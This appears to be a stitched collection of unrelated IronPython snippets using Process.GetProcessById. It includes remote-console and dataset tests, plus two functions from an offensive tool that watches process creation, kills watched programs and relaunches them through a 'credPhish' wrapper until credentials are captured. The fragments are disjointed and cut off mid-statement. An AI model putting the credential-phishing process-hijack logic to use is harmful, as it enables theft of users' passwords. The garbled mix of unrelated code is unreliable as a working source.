def test_remote_runtime_normal_exit(): ipi = start_remote_console() consoleProcessId, remoteRuntimeProcessId = get_process_ids(ipi) runtimeProcess = Process.GetProcessById(remoteRuntimeProcessId) Assert(not runtimeProcess.HasExited) ipi.End() runtimeProcess.WaitForExit() # The test is that this wait succeeds
def ProcEventHandler(sender, e): proc = e.NewEvent if proc['TargetInstance']['Name'] in WATCHLIST: Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill() print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine']) cp = credPhish(proc) print "[+] PROCESS SPAWNED: {0} {1}".format(cp.path, cp.NewProcess.StartInfo.Arguments) cp.NewProcess.Start() print "[!] PROCESS EXIT CODE: {0}".format(cp.NewProcess.ExitCode)
def procWatch(): print "[*] Watching Process Creation for: {0}".format(", ".join(WATCHLIST)) while GOT_CRED is False: try: proc = startWatch.WaitForNextEvent() if proc['TargetInstance']['Name'] in WATCHLIST: Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill() print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine']) cp = credPhish(proc) if hasattr(cp, "NewProcess"): cp.NewProcess.Start() print "[+] PROCESS SPAWNED: {0}\t{1} {2}".format(cp.NewProcess.Id, cp.path, cp.NewProcess.StartInfo.Arguments) #Process.GetCurrentProcess.Kill() Thread.GetCurrentThread().Abort() except: break
def test_remote_server_restart(): ipi = start_remote_console() consoleProcessId, remoteRuntimeProcessId = get_process_ids(ipi) runtimeProcess = Process.GetProcessById(remoteRuntimeProcessId) AreNotEqual(runtimeProcess, consoleProcessId) runtimeProcess.Kill() runtimeProcess.WaitForExit() # The Process.Exited event is fired asynchronously, and might take sometime to fire. # Hence, we need to block for a known marker ipi.EatToMarker("Remote runtime terminated") # We need to press Enter to nudge the old console out of the ReadLine... restartMessage = ipi.ExecuteLine("", True) ipi.ReadError() consoleProcessId2, remoteRuntimeProcessId2 = get_process_ids(ipi) AreEqual(consoleProcessId, consoleProcessId2) # This is technically not a 100% correct as there is a small chance the the process id might get reused AreNotEqual(remoteRuntimeProcessId, remoteRuntimeProcessId2) ipi.End()
def kill(pid): process = CSharpProcess.GetProcessById(pid) process.Kill() while not process.HasExited: time.sleep(0.1)
if processid != 0: print 'Pass: Dataset was activated successfully' else: print 'Fail: Dataset was not activated' sys.exit(1) except System.Exception, e: print 'Fail: Dataset activation threw exception' print e.ToString() sys.exit(1) # Deactivate dataset on local machine try: childdataset.OnDeactivated += switchondeactivate # Grab the child process so that we can watch it process = Process.GetProcessById(processid) # Deactivate it childdataset.Deactivate() # Wait for the deactivate event deactivateevent.WaitOne(2 * 60 * 1000) # See if the child process is gone if not process.HasExited: process.WaitForExit(2 * 60 * 1000) if not process.HasExited: print 'Fail: Dataset was not deactivated' sys.exit(1) else: